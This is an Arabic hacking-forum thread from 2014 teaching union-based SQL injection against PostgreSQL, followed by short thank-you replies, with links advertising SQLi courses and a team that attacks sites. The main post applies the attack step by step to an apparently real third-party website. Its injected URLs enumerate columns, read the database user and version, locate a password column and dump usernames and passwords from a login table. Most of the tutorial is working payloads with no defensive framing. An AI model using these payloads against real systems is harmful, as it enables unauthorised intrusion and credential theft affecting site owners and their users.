1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] ثغرة PostgreSQL وطريقة حقنه بطريقة union based

الموضوع في '[ SQL-injection ]' بواسطة CoBrA-M, بتاريخ ‏25 نوفمبر 2014.

كاتب الموضوع : CoBrA-M المشاهدات : 632 الردود : 9 ‏25 نوفمبر 2014
حالة الموضوع:
مغلق
  1. غير متصل

    CoBrA-M
    Developer

    عضو منذ:
    ‏2 مايو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:

    [​IMG]
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    والصلاه والسلام على خاتم الانبياء والمرسلين سيدنا محمد وعلى آله وصحبه أجميعن

    [​IMG]

    [​IMG]

    معنا شرح بسيط حول PostgreSQL

    الي هو قاعدة من قواعدة البيانات النادرة جدا

    راح نتكلم على طريقة حقنه بطريقة union based

    وفي المرة الجاية راح يكون error based

    طبعا معانا هدف نطبق عليه :{5!}:

    كود PHP:
    http://www.spaceco.com/cm.php?prod_id=1&page_prod_id=1
    الاعمدة 6
    في استعلام postgresql لازملنا شغلتين عشان نقدر نطلع العواميد المصابة
    اول شغلة استبدال المتغيرة بقيمة فارغة
    والشغلة الثانية تشفير الاعمدة تشفير اوراكل
    نشوف الاخطاء ونشوف كيف نتفداها

    لو يكون الاستعلام مبدئي مثل كل الاستعلامات راح يضهر لنا خطا


    كود PHP:
    http://www.spaceco.com/cm.php?prod_id=1'&page_prod_id=1 and 1=1 union all select 1,2,3,4,5,6
    [​IMG]

    لو نستبدل المتغيرة بقيمة فارغة بدون تشفير اوراكل للاعمدة راح يبقى الخطا

    كود PHP:
    http://www.spaceco.com/cm.php?prod_id=1'&page_prod_id=null and 1=1 union all select 1,2,3,4,5,6
    [​IMG]

    لكن لو نشفر الاعمدة تشفير اوراكل بدون استبدال المتغيرة بقيمة فارغة راح يبقى الخطا

    كود PHP:
    http://www.spaceco.com/cm.php?prod_id=1'&page_prod_id=1 and 1=1 union all select  CHR(49), CHR(50), CHR(51), CHR(52), CHR(53), CHR(54)
    [​IMG]

    هنا عرفنا انو الكل يرتبط ببعض مثل مايقولو

    الان نشفر الاعمدة تشفير اوراكل ونخلي المتغيرة فارغة راح تطلع الاعمدة

    كود PHP:
    http://www.spaceco.com/cm.php?prod_id=1'&page_prod_id=null and 1=1 union all select  CHR(49), CHR(50), CHR(51), CHR(52), CHR(53), CHR(54)
    [​IMG]

    الان نشوف معلومات حول القاعدة اصدارها و اسمها ويوزرها

    كود PHP:
    http://www.spaceco.com/cm.php?prod_id=1'&page_prod_id=null and 1=1 union all select  current_user||CHR(58)||current_database()||CHR(58)||version()||CHR(58), CHR(50), CHR(51), CHR(52), CHR(53), CHR(54)
    [​IMG]

    الان نطلب اي جدول فيه حقل pass
    وطبعا كلمت pass نشفرها اوراكل
    والتنقل يكون ب
    offset 1
    offset 2
    الى اخره


    كود PHP:
    http://www.spaceco.com/cm.php?prod_id=1'&page_prod_id=null and 1=1 union all select  table_name, CHR(50), CHR(51), CHR(52), CHR(53), CHR(54) from+information_schema.columns+where+column_name= CHR(112) || CHR(97) || CHR(115) || CHR(115) || CHR(119) || CHR(111) || CHR(114) || CHR(100) limit 1 offset 1
    [​IMG]

    تمام ظهر معانا جدول login نطلع حقوله لكن عشان تظهر الحقول لازم نشفره تشفير اوراكل

    كود PHP:
    http://www.spaceco.com/cm.php?prod_id=1'&page_prod_id=null and 1=1 union all select  array_to_string(array_agg(column_name::XML),$$:$$), CHR(50), CHR(51), CHR(52), CHR(53), CHR(54) from+information_schema.columns+where+table_name= CHR(108) || CHR(111) || CHR(103) || CHR(105) || CHR(110)
    [​IMG]

    الان ناتي لاخلاصة الموضوع :ُ7e@:

    كود PHP:
    http://www.spaceco.com/cm.php?prod_id=1'&page_prod_id=null and 1=1 union all select  user_name||chr(58)||password, CHR(50), CHR(51), CHR(52), CHR(53), CHR(54) from+login
    [​IMG]

    [​IMG]
     


    جاري تحميل الصفحة...
  2. غير متصل

    MR.CAPTCHA Expert Developer
    ExpErt DeveloPer

    عضو منذ:
    ‏30 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    الوظيفة:
    I.T Student
    الإقامة:

    رد: ثغرة PostgreSQL وطريقة حقنه بطريقة union based

    احسنت
    شرح مبسط و مفيد

     


  3. غير متصل

    ابو عبد السلام
    rank
    Developer

    عضو منذ:
    ‏30 أكتوبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: ثغرة PostgreSQL وطريقة حقنه بطريقة union based

    ربي يعطيكـ العافيه \
     


  4. غير متصل

    Dr.AnTi_HaCkEr
    DeveloPer Plus

    عضو منذ:
    ‏8 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:

    رد: ثغرة PostgreSQL وطريقة حقنه بطريقة union based

    يعطيك العافية وسلمت يداك
     


  5. غير متصل

    MJHOoL-HKR
    rank
    Developer

    عضو منذ:
    ‏27 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    private
    الإقامة:

    رد: ثغرة PostgreSQL وطريقة حقنه بطريقة union based

    شكراً اخي بارك الله بجهوودك
     


  6. غير متصل

    CoBrA-M
    Developer

    عضو منذ:
    ‏2 مايو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    8
    نقاط الجائزة:

    رد: ثغرة PostgreSQL وطريقة حقنه بطريقة union based

    منورين والله :ُeُe1!0:
     


  7. غير متصل

    нαcĸ
    rankrank
    Developer

    عضو منذ:
    ‏4 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    رد: ثغرة PostgreSQL وطريقة حقنه بطريقة union based

    يعطيك العافيه ما قصرت [​IMG]
     


  8. غير متصل

    BEN LADEN _DZ
    rank
    Developer

    عضو منذ:
    ‏10 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: ثغرة PostgreSQL وطريقة حقنه بطريقة union based

    موضوع جميل بارك الله فيك

    تسلم
     


  9. غير متصل

    coiffa
    rank
    Developer

    عضو منذ:
    ‏1 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: ثغرة PostgreSQL وطريقة حقنه بطريقة union based

    برافو اخي يعطيك العافية وسلمت يداك
     


  10. غير متصل

    Ĝυēναяα
    Developer

    عضو منذ:
    ‏21 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: ثغرة PostgreSQL وطريقة حقنه بطريقة union based

    ﭔآړﮗ آلْـلْـھ ڤـﭜﮗ :{1}:

    ۈآلْـلْـھ ﭜعطـﭜﮗ آلْـعآڤـﭜہ ً#ٌ5oًًًُ.
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...